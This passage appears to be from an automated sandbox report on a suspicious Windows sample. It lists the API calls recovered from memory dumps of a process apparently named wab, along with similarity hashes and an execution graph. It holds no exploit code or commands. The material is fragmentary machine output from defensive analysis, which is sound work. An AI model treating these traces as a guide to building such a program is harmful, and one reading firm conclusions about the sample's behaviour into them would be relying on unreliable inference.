                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,20DE6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 20DE8731
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 20DE87BA
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 20DE87CC
                  • __freea.LIBCMT ref: 20DE87D5
                    • Part of subcall function 20DE56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20DE5702
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: e67555449f7c7931c540279b007370f5818057fa6467888e59a15a48da169f05
                  • Instruction ID: 6b93957124b1f157231faebd0ac824aa186f0b4bc70181a2e289f645ddc6bd1d
                  • Opcode Fuzzy Hash: e67555449f7c7931c540279b007370f5818057fa6467888e59a15a48da169f05
                  • Instruction Fuzzy Hash: CC31A032A0220AABDF149FA6CC85EAF7BA5EB40210F25016CFD0CD6590E735DD94CBA0
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,20DE1D66,00000000,00000000,?,20DE5C88,20DE1D66,00000000,00000000,00000000,?,20DE5E85,00000006,FlsSetValue), ref: 20DE5D13
                  • GetLastError.KERNEL32(?,20DE5C88,20DE1D66,00000000,00000000,00000000,?,20DE5E85,00000006,FlsSetValue,20DEE190,FlsSetValue,00000000,00000364,?,20DE5BC8), ref: 20DE5D1F
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,20DE5C88,20DE1D66,00000000,00000000,00000000,?,20DE5E85,00000006,FlsSetValue,20DEE190,FlsSetValue,00000000), ref: 20DE5D2D
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 9a3944afb2cca84a826d1ebcdd21d1033dd0c9057ff63dda3cf861f95b50999d
                  • Instruction ID: a84838a2e03536e6244187f01593d44559ff24eba7398c22e93fd9954e26b33d
                  • Opcode Fuzzy Hash: 9a3944afb2cca84a826d1ebcdd21d1033dd0c9057ff63dda3cf861f95b50999d
                  • Instruction Fuzzy Hash: A401FC36607B22ABC3114FAA8C8CE46375CAF056F1B240628F91ED7154DB34D901C6E0
                  APIs
                  • _free.LIBCMT ref: 20DE655C
                    • Part of subcall function 20DE62BC: IsProcessorFeaturePresent.KERNEL32(00000017,20DE62AB,00000000,?,?,?,?,00000016,?,?,20DE62B8,00000000,00000000,00000000,00000000,00000000), ref: 20DE62BE
                    • Part of subcall function 20DE62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 20DE62E0
                    • Part of subcall function 20DE62BC: TerminateProcess.KERNEL32(00000000), ref: 20DE62E7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                  • String ID: *?$.
                  • API String ID: 2667617558-3972193922
                  • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                  • Instruction ID: 847d3e7382207d8ee43572fbbd13974ba2f859eacd2f8a777ee63b11920f205f
                  • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                  • Instruction Fuzzy Hash: E451E279E01209AFCB04CFE9C880AADBBF5EF58354F24816DE558E7346E6359E018B60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: _strlen
                  • String ID: : $Se.
                  • API String ID: 4218353326-4089948878
                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                  • Instruction ID: 8d3b432db0773e4646aebbe048dea172eab8c23559af7e8a61518533c935e59a
                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                  • Instruction Fuzzy Hash: F5112775A00348AFCB11DFE9D841BDDFBFCAF19604F10405AE549E7212E6705B02C760
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 20DE2903
                    • Part of subcall function 20DE35D2: RaiseException.KERNEL32(?,?,?,20DE2925,00000000,00000000,00000000,?,?,?,?,?,20DE2925,?,20DF21B8), ref: 20DE3632
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 20DE2920
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: Unknown exception
                  • API String ID: 3476068407-410509341
                  • Opcode ID: fb365024d5f8946c824fc991fb3433a328f4625d019d580338b8fc04f35fd831
                  • Instruction ID: 07addd395e80053a449ebeefc298121a7694081c369cacb6e456fa93c694448f
                  • Opcode Fuzzy Hash: fb365024d5f8946c824fc991fb3433a328f4625d019d580338b8fc04f35fd831
                  • Instruction Fuzzy Hash: E0F0A43490230D77CB04A6E7EC89B7E776C6B11650FA0417CFA5C96191EF31EA15C5E4

                  Execution Graph

                  Execution Coverage:6.3%
                  Dynamic/Decrypted Code Coverage:9.2%
                  Signature Coverage:1.5%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:79
                  execution_graph 40333 441819 40336 430737 40333->40336 40335 441825 40337 430756 40336->40337 40349 43076d 40336->40349 40338 430774 40337->40338 40339 43075f 40337->40339 40350 43034a 40338->40350 40361 4169a7 11 API calls 40339->40361 40342 4307ce 40343 430819 memset 40342->40343 40354 415b2c 40342->40354 40343->40349 40344 43077e 40344->40342 40347 4307fa 40344->40347 40344->40349 40346 4307e9 40346->40343 40346->40349 40362 4169a7 11 API calls 40347->40362 40349->40335 40351 430359 40350->40351 40352 43034e 40350->40352 40351->40344 40363 415c23 memcpy 40352->40363 40355 415b42 40354->40355 40360 415b46 40354->40360 40356 415b94 40355->40356 40357 415b5a 40355->40357 40355->40360 40358 4438b5 10 API calls 40356->40358 40359 415b79 memcpy 40357->40359 40357->40360 40358->40360 40359->40360 40360->40346 40361->40349 40362->40349 40363->40351 37671 442ec6 19 API calls 37848 4152c6 malloc 37849 4152e2 37848->37849 37850 4152ef 37848->37850 37852 416760 11 API calls 37850->37852 37852->37849 37853 4466f4 37872 446904 37853->37872 37855 446700 GetModuleHandleA 37858 446710 __set_app_type __p__fmode __p__commode 37855->37858 37857 4467a4 37859 4467ac __setusermatherr 37857->37859 37860 4467b8 37857->37860 37858->37857 37859->37860 37873 4468f0 _controlfp 37860->37873 37862 4467bd _initterm __wgetmainargs _initterm 37864 44681e GetStartupInfoW 37862->37864 37865 446810 37862->37865 37866 446866 GetModuleHandleA 37864->37866 37874 41276d 37866->37874 37870 446896 exit 37871 44689d _cexit 37870->37871 37871->37865 37872->37855 37873->37862 37875 41277d 37874->37875 37917 4044a4 LoadLibraryW 37875->37917 37877 412785 37909 412789 37877->37909 37925 414b81 37877->37925 37880 4127c8 37931 412465 memset ??2@YAPAXI 37880->37931 37882 4127ea 37943 40ac21 37882->37943 37887 412813 37961 40dd07 memset 37887->37961 37888 412827 37966 40db69 memset 37888->37966 37891 412822 37987 4125b6 ??3@YAXPAX 37891->37987 37893 40ada2 _wcsicmp 37894 41283d 37893->37894 37894->37891 37897 412863 CoInitialize 37894->37897 37971 41268e 37894->37971 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37897->37991 37901 41296f 37993 40b633 37901->37993 37904 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37908 412957 37904->37908 37914 4128ca 37904->37914 37908->37891 37909->37870 37909->37871 37910 4128d0 TranslateAcceleratorW 37911 412941 GetMessageW 37910->37911 37910->37914 37911->37908 37911->37910 37912 412909 IsDialogMessageW 37912->37911 37912->37914 37913 4128fd IsDialogMessageW 37913->37911 37913->37912 37914->37910 37914->37912 37914->37913 37915 41292b TranslateMessage DispatchMessageW 37914->37915 37916 41291f IsDialogMessageW 37914->37916 37915->37911 37916->37911 37916->37915 37918 4044cf GetProcAddress 37917->37918 37921 4044f7 37917->37921 37919 4044e8 FreeLibrary 37918->37919 37922 4044df 37918->37922 37920 4044f3 37919->37920 37919->37921 37920->37921 37923 404507 MessageBoxW 37921->37923 37924 40451e 37921->37924 37922->37919 37923->37877 37924->37877 37926 414b8a 37925->37926 37927 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37925->37927 37997 40a804 memset 37926->37997 37927->37880 37930 414b9e GetProcAddress 37930->37927 37932 4124e0 37931->37932 37933 412505 ??2@YAPAXI 37932->37933 37934 41251c 37933->37934 37936 412521 37933->37936 38019 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37934->38019 38008 444722 37936->38008 37942 41259b wcscpy 37942->37882 38024 40b1ab ??3@YAXPAX ??3@YAXPAX 37943->38024 37947 40ad4b 37956 40ad76 37947->37956 38048 40a9ce 37947->38048 37948 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37950 40ac5c 37948->37950 37950->37947 37950->37948 37951 40ace7 ??3@YAXPAX 37950->37951 37950->37956 38028 40a8d0 37950->38028 38040 4099f4 37950->38040 37951->37950 37955 40a8d0 7 API calls 37955->37956 38025 40aa04 37956->38025 37957 40ada2 37958 40adc9 37957->37958 37959 40adaa 37957->37959 37958->37887 37958->37888 37959->37958 37960 40adb3 _wcsicmp 37959->37960 37960->37958 37960->37959 38053 40dce0 37961->38053 37963 40dd3a GetModuleHandleW 38058 40dba7 37963->38058 37967 40dce0 3 API calls 37966->37967 37968 40db99 37967->37968 38130 40dae1 37968->38130 38144 402f3a 37971->38144 37973 412766 37973->37891 37973->37897 37974 4126d3 _wcsicmp 37975 4126a8 37974->37975 37975->37973 37975->37974 37977 41270a 37975->37977 38178 4125f8 7 API calls 37975->38178 37977->37973 38147 411ac5 37977->38147 37988 4125da 37987->37988 37989 4125f0 37988->37989 37990 4125e6 DeleteObject 37988->37990 37992 40b1ab ??3@YAXPAX ??3@YAXPAX 37989->37992 37990->37989 37991->37904 37992->37901 37994 40b640 37993->37994 37995 40b639 ??3@YAXPAX 37993->37995 37996 40b1ab ??3@YAXPAX ??3@YAXPAX 37994->37996 37995->37994 37996->37909 37998 40a83b GetSystemDirectoryW 37997->37998 37999 40a84c wcscpy 37997->37999 37998->37999 38004 409719 wcslen 37999->38004 38002 40a881 LoadLibraryW 38003 40a886 38002->38003 38003->37927 38003->37930 38005 409724 38004->38005 38006 409739 wcscat LoadLibraryW 38004->38006 38005->38006 38007 40972c wcscat 38005->38007 38006->38002 38006->38003 38007->38006 38009 444732 38008->38009 38010 444728 DeleteObject 38008->38010 38020 409cc3 38009->38020 38010->38009 38012 412551 38013 4010f9 38012->38013 38014 401130 38013->38014 38015 401134 GetModuleHandleW LoadIconW 38014->38015 38016 401107 wcsncat 38014->38016 38017 40a7be 38015->38017 38016->38014 38018 40a7d2 38017->38018 38018->37942 38018->38018 38019->37936 38023 409bfd memset wcscpy 38020->38023 38022 409cdb CreateFontIndirectW 38022->38012 38023->38022 38024->37950 38026 40aa14 38025->38026 38027 40aa0a ??3@YAXPAX 38025->38027 38026->37957 38027->38026 38029 40a8eb 38028->38029 38030 40a8df wcslen 38028->38030 38031 40a906 ??3@YAXPAX 38029->38031 38032 40a90f 38029->38032 38030->38029 38033 40a919 38031->38033 38034 4099f4 3 API calls 38032->38034 38035 40a932 38033->38035 38036 40a929 ??3@YAXPAX 38033->38036 38034->38033 38038 4099f4 3 API calls 38035->38038 38037 40a93e memcpy 38036->38037 38037->37950 38039 40a93d 38038->38039 38039->38037 38041 409a41 38040->38041 38042 4099fb malloc 38040->38042 38041->37950 38044 409a37 38042->38044 38045 409a1c 38042->38045 38044->37950 38046 409a30 ??3@YAXPAX 38045->38046 38047 409a20 memcpy 38045->38047 38046->38044 38047->38046 38049 40a9e7 38048->38049 38050 40a9dc ??3@YAXPAX 38048->38050 38052 4099f4 3 API calls 38049->38052 38051 40a9f2 38050->38051 38051->37955 38052->38051 38077 409bca GetModuleFileNameW 38053->38077 38055 40dce6 wcsrchr 38056 40dcf5 38055->38056 38057 40dcf9 wcscat 38055->38057 38056->38057 38057->37963 38078 44db70 38058->38078 38062 40dbfd 38081 4447d9 38062->38081 38065 40dc34 wcscpy wcscpy 38107 40d6f5 38065->38107 38066 40dc1f wcscpy 38066->38065 38069 40d6f5 3 API calls 38070 40dc73 38069->38070 38071 40d6f5 3 API calls 38070->38071 38072 40dc89 38071->38072 38073 40d6f5 3 API calls 38072->38073 38074 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38073->38074 38113 40da80 38074->38113 38077->38055 38079 40dbb4 memset memset 38078->38079 38080 409bca GetModuleFileNameW 38079->38080 38080->38062 38083 4447f4 38081->38083 38082 40dc1b 38082->38065 38082->38066 38083->38082 38084 444807 ??2@YAPAXI 38083->38084 38085 44481f 38084->38085 38086 444873 _snwprintf 38085->38086 38087 4448ab wcscpy 38085->38087 38120 44474a 8 API calls 38086->38120 38089 4448bb 38087->38089 38121 44474a 8 API calls 38089->38121 38090 4448a7 38090->38087 38090->38089 38092 4448cd 38122 44474a 8 API calls 38092->38122 38094 4448e2 38123 44474a 8 API calls 38094->38123 38096 4448f7 38124 44474a 8 API calls 38096->38124 38098 44490c 38125 44474a 8 API calls 38098->38125 38100 444921 38126 44474a 8 API calls 38100->38126 38102 444936 38127 44474a 8 API calls 38102->38127 38104 44494b 38128 44474a 8 API calls 38104->38128 38106 444960 ??3@YAXPAX 38106->38082 38108 44db70 38107->38108 38109 40d702 memset GetPrivateProfileStringW 38108->38109 38110 40d752 38109->38110 38111 40d75c WritePrivateProfileStringW 38109->38111 38110->38111 38112 40d758 38110->38112 38111->38112 38112->38069 38114 44db70 38113->38114 38115 40da8d memset 38114->38115 38116 40daac LoadStringW 38115->38116 38117 40dac6 38116->38117 38117->38116 38119 40dade 38117->38119 38129 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38117->38129 38119->37891 38120->38090 38121->38092 38122->38094 38123->38096 38124->38098 38125->38100 38126->38102 38127->38104 38128->38106 38129->38117 38140 409b98 GetFileAttributesW 38130->38140 38132 40daea 38133 40db63 38132->38133 38134 40daef wcscpy wcscpy GetPrivateProfileIntW 38132->38134 38133->37893 38141 40d65d GetPrivateProfileStringW 38134->38141 38136 40db3e 38142 40d65d GetPrivateProfileStringW 38136->38142 38138 40db4f 38143 40d65d GetPrivateProfileStringW 38138->38143 38140->38132 38141->38136 38142->38138 38143->38133 38179 40eaff 38144->38179 38148 411ae2 memset 38147->38148 38149 411b8f 38147->38149 38219 409bca GetModuleFileNameW 38148->38219 38161 411a8b 38149->38161 38151 411b0a wcsrchr 38152 411b22 wcscat 38151->38152 38153 411b1f 38151->38153 38220 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38152->38220 38153->38152 38155 411b67 38221 402afb 38155->38221 38159 411b7f 38277 40ea13 SendMessageW memset SendMessageW 38159->38277 38162 402afb 27 API calls 38161->38162 38163 411ac0 38162->38163 38164 4110dc 38163->38164 38165 41113e 38164->38165 38170 4110f0 38164->38170 38302 40969c LoadCursorW SetCursor 38165->38302 38167 411143 38303 4032b4 38167->38303 38321 444a54 38167->38321 38168 4110f7 _wcsicmp 38168->38170 38169 411157 38171 40ada2 _wcsicmp 38169->38171 38170->38165 38170->38168 38324 410c46 10 API calls 38170->38324 38174 411167 38171->38174 38172 4111af 38174->38172 38175 4111a6 qsort 38174->38175 38175->38172 38178->37975 38180 40eb10 38179->38180 38192 40e8e0 38180->38192 38183 40eb6c memcpy memcpy 38184 40ebb7 38183->38184 38184->38183 38185 40ebf2 ??2@YAPAXI ??2@YAPAXI 38184->38185 38188 40d134 16 API calls 38184->38188 38186 40ec2e ??2@YAPAXI 38185->38186 38189 40ec65 38185->38189 38186->38189 38188->38184 38189->38189 38202 40ea7f 38189->38202 38191 402f49 38191->37975 38193 40e8f2 38192->38193 38194 40e8eb ??3@YAXPAX 38192->38194 38195 40e900 38193->38195 38196 40e8f9 ??3@YAXPAX 38193->38196 38194->38193 38197 40e911 38195->38197 38198 40e90a ??3@YAXPAX 38195->38198 38196->38195 38199 40e931 ??2@YAPAXI ??2@YAPAXI 38197->38199 38200 40e921 ??3@YAXPAX 38197->38200 38201 40e92a ??3@YAXPAX 38197->38201 38198->38197 38199->38183 38200->38201 38201->38199 38203 40aa04 ??3@YAXPAX 38202->38203 38204 40ea88 38203->38204 38205 40aa04 ??3@YAXPAX 38204->38205 38206 40ea90 38205->38206 38207 40aa04 ??3@YAXPAX 38206->38207 38208 40ea98 38207->38208 38209 40aa04 ??3@YAXPAX 38208->38209 38210 40eaa0 38209->38210 38211 40a9ce 4 API calls 38210->38211 38212 40eab3 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eabd 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eac7 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40ead1 38217->38218 38218->38191 38219->38151 38220->38155 38278 40b2cc 38221->38278 38223 402b0a 38224 40b2cc 27 API calls 38223->38224 38225 402b23 38224->38225 38226 40b2cc 27 API calls 38225->38226 38227 402b3a 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b54 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b6b 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b82 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b99 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402bb0 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bc7 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bde 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bf5 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402c0c 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c23 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c3a 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c51 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c68 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c7f 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c99 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402cb3 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cd5 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cf0 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402d0b 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d26 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d3e 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d59 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d78 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d93 38274->38275 38276 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38275->38276 38276->38159 38277->38149 38281 40b58d 38278->38281 38280 40b2d1 38280->38223 38282 40b5a4 GetModuleHandleW FindResourceW 38281->38282 38283 40b62e 38281->38283 38284 40b5c2 LoadResource 38282->38284 38286 40b5e7 38282->38286 38283->38280 38285 40b5d0 SizeofResource LockResource 38284->38285 38284->38286 38285->38286 38286->38283 38294 40afcf 38286->38294 38288 40b608 memcpy 38297 40b4d3 memcpy 38288->38297 38290 40b61e 38298 40b3c1 18 API calls 38290->38298 38292 40b626 38299 40b04b 38292->38299 38295 40b04b ??3@YAXPAX 38294->38295 38296 40afd7 ??2@YAPAXI 38295->38296 38296->38288 38297->38290 38298->38292 38300 40b051 ??3@YAXPAX 38299->38300 38301 40b05f 38299->38301 38300->38301 38301->38283 38302->38167 38304 4032c4 38303->38304 38305 40b633 ??3@YAXPAX 38304->38305 38306 403316 38305->38306 38325 44553b 38306->38325 38310 403480 38521 40368c 15 API calls 38310->38521 38312 403489 38313 40b633 ??3@YAXPAX 38312->38313 38314 403495 38313->38314 38314->38169 38315 4033a9 memset memcpy 38316 4033ec wcscmp 38315->38316 38317 40333c 38315->38317 38316->38317 38317->38310 38317->38315 38317->38316 38519 4028e7 11 API calls 38317->38519 38520 40f508 6 API calls 38317->38520 38319 403421 _wcsicmp 38319->38317 38322 444a64 FreeLibrary 38321->38322 38323 444a83 38321->38323 38322->38323 38323->38169 38324->38170 38326 445548 38325->38326 38327 445599 38326->38327 38522 40c768 38326->38522 38328 4455a8 memset 38327->38328 38335 4457f2 38327->38335 38605 403988 38328->38605 38339 445854 38335->38339 38707 403e2d memset memset memset memset memset 38335->38707 38336 445672 38616 403fbe memset memset memset memset memset 38336->38616 38337 4458bb memset memset 38343 414c2e 16 API calls 38337->38343 38388 4458aa 38339->38388 38730 403c9c memset memset memset memset memset 38339->38730 38341 44595e memset memset 38348 414c2e 16 API calls 38341->38348 38342 4455e5 38342->38336 38351 44560f 38342->38351 38344 4458f9 38343->38344 38349 40b2cc 27 API calls 38344->38349 38346 445a00 memset memset 38753 414c2e 38346->38753 38347 445b22 38353 445bca 38347->38353 38354 445b38 memset memset memset 38347->38354 38358 44599c 38348->38358 38359 445909 38349->38359 38350 44557a 38385 44558c 38350->38385 38802 41366b FreeLibrary 38350->38802 38362 4087b3 338 API calls 38351->38362 38352 445849 38817 40b1ab ??3@YAXPAX ??3@YAXPAX 38352->38817 38360 445c8b memset memset 38353->38360 38427 445cf0 38353->38427 38363 445bd4 38354->38363 38364 445b98 38354->38364 38367 40b2cc 27 API calls 38358->38367 38368 409d1f 6 API calls 38359->38368 38371 414c2e 16 API calls 38360->38371 38361 44589f 38818 40b1ab ??3@YAXPAX ??3@YAXPAX 38361->38818 38369 445621 38362->38369 38377 414c2e 16 API calls 38363->38377 38364->38363 38373 445ba2 38364->38373 38370 4459ac 38367->38370 38381 445919 38368->38381 38803 4454bf 20 API calls 38369->38803 38383 409d1f 6 API calls 38370->38383 38384 445cc9 38371->38384 38890 4099c6 wcslen 38373->38890 38374 4456b2 38805 40b1ab ??3@YAXPAX ??3@YAXPAX 38374->38805 38376 40b2cc 27 API calls 38389 445a4f 38376->38389 38391 445be2 38377->38391 38378 403335 38518 4452e5 45 API calls 38378->38518 38379 445d3d 38411 40b2cc 27 API calls 38379->38411 38380 445d88 memset memset memset 38394 414c2e 16 API calls 38380->38394 38819 409b98 GetFileAttributesW 38381->38819 38382 445823 38382->38352 38393 4087b3 338 API calls 38382->38393 38395 4459bc 38383->38395 38396 409d1f 6 API calls 38384->38396 38589 444b06 38385->38589 38386 445879 38386->38361 38407 4087b3 338 API calls 38386->38407 38388->38337 38412 44594a 38388->38412 38768 409d1f wcslen wcslen 38389->38768 38400 40b2cc 27 API calls 38391->38400 38393->38382 38404 445dde 38394->38404 38886 409b98 GetFileAttributesW 38395->38886 38406 445ce1 38396->38406 38397 445bb3 38893 445403 memset 38397->38893 38398 445680 38398->38374 38639 4087b3 memset 38398->38639 38401 445bf3 38400->38401 38410 409d1f 6 API calls 38401->38410 38402 445928 38402->38412 38820 40b6ef 38402->38820 38413 40b2cc 27 API calls 38404->38413 38910 409b98 GetFileAttributesW 38406->38910 38407->38386 38421 445c07 38410->38421 38422 445d54 _wcsicmp 38411->38422 38412->38341 38426 4459ed 38412->38426 38425 445def 38413->38425 38414 4459cb 38414->38426 38435 40b6ef 252 API calls 38414->38435 38418 40b2cc 27 API calls 38419 445a94 38418->38419 38773 40ae18 38419->38773 38420 44566d 38420->38335 38690 413d4c 38420->38690 38431 445389 258 API calls 38421->38431 38432 445d71 38422->38432 38497 445d67 38422->38497 38424 445665 38804 40b1ab ??3@YAXPAX ??3@YAXPAX 38424->38804 38433 409d1f 6 API calls 38425->38433 38426->38346 38426->38347 38427->38378 38427->38379 38427->38380 38428 445389 258 API calls 38428->38353 38437 445c17 38431->38437 38911 445093 23 API calls 38432->38911 38440 445e03 38433->38440 38435->38426 38436 4456d8 38442 40b2cc 27 API calls 38436->38442 38443 40b2cc 27 API calls 38437->38443 38439 44563c 38439->38424 38445 4087b3 338 API calls 38439->38445 38912 409b98 GetFileAttributesW 38440->38912 38441 40b6ef 252 API calls 38441->38378 38447 4456e2 38442->38447 38448 445c23 38443->38448 38444 445d83 38444->38378 38445->38439 38806 413fa6 _wcsicmp _wcsicmp 38447->38806 38452 409d1f 6 API calls 38448->38452 38450 445e12 38457 445e6b 38450->38457 38463 40b2cc 27 API calls 38450->38463 38455 445c37 38452->38455 38453 445aa1 38456 445b17 38453->38456 38471 445ab2 memset 38453->38471 38484 409d1f 6 API calls 38453->38484 38780 40add4 38453->38780 38785 445389 38453->38785 38794 40ae51 38453->38794 38454 4456eb 38459 4456fd memset memset memset memset 38454->38459 38460 4457ea 38454->38460 38461 445389 258 API calls 38455->38461 38887 40aebe 38456->38887 38914 445093 23 API calls 38457->38914 38807 409c70 wcscpy wcsrchr 38459->38807 38810 413d29 38460->38810 38466 445c47 38461->38466 38467 445e33 38463->38467 38473 40b2cc 27 API calls 38466->38473 38474 409d1f 6 API calls 38467->38474 38469 445e7e 38470 445f67 38469->38470 38479 40b2cc 27 API calls 38470->38479 38475 40b2cc 27 API calls 38471->38475 38477 445c53 38473->38477 38478 445e47 38474->38478 38475->38453 38476 409c70 2 API calls 38480 44577e 38476->38480 38481 409d1f 6 API calls 38477->38481 38913 409b98 GetFileAttributesW 38478->38913 38483 445f73 38479->38483 38485 409c70 2 API calls 38480->38485 38486 445c67 38481->38486 38488 409d1f 6 API calls 38483->38488 38484->38453 38489 44578d 38485->38489 38490 445389 258 API calls 38486->38490 38487 445e56 38487->38457 38493 445e83 memset 38487->38493 38491 445f87 38488->38491 38489->38460 38496 40b2cc 27 API calls 38489->38496 38490->38353 38917 409b98 GetFileAttributesW 38491->38917 38495 40b2cc 27 API calls 38493->38495 38498 445eab 38495->38498 38499 4457a8 38496->38499 38497->38378 38497->38441 38500 409d1f 6 API calls 38498->38500 38501 409d1f 6 API calls 38499->38501 38502 445ebf 38500->38502 38503 4457b8 38501->38503 38504 40ae18 9 API calls 38502->38504 38809 409b98 GetFileAttributesW 38503->38809 38514 445ef5 38504->38514 38506 4457c7 38506->38460 38508 4087b3 338 API calls 38506->38508 38507 40ae51 9 API calls 38507->38514 38508->38460 38509 445f5c 38511 40aebe FindClose 38509->38511 38510 40add4 2 API calls 38510->38514 38511->38470 38512 40b2cc 27 API calls 38512->38514 38513 409d1f 6 API calls 38513->38514 38514->38507 38514->38509 38514->38510 38514->38512 38514->38513 38516 445f3a 38514->38516 38915 409b98 GetFileAttributesW 38514->38915 38916 445093 23 API calls 38516->38916 38518->38317 38519->38319 38520->38317 38521->38312 38523 40c775 38522->38523 38918 40b1ab ??3@YAXPAX ??3@YAXPAX 38523->38918 38525 40c788 38919 40b1ab ??3@YAXPAX ??3@YAXPAX 38525->38919 38527 40c790 38920 40b1ab ??3@YAXPAX ??3@YAXPAX 38527->38920 38529 40c798 38530 40aa04 ??3@YAXPAX 38529->38530 38531 40c7a0 38530->38531 38921 40c274 memset 38531->38921 38536 40a8ab 9 API calls 38537 40c7c3 38536->38537 38538 40a8ab 9 API calls 38537->38538 38539 40c7d0 38538->38539 38950 40c3c3 38539->38950 38543 40c877 38552 40bdb0 38543->38552 38544 40c86c 38992 4053fe 39 API calls 38544->38992 38546 40c7e5 38546->38543 38546->38544 38551 40c634 49 API calls 38546->38551 38975 40a706 38546->38975 38551->38546 39182 404363 38552->39182 38555 40bf5d 39202 40440c 38555->39202 38557 40bdee 38557->38555 38560 40b2cc 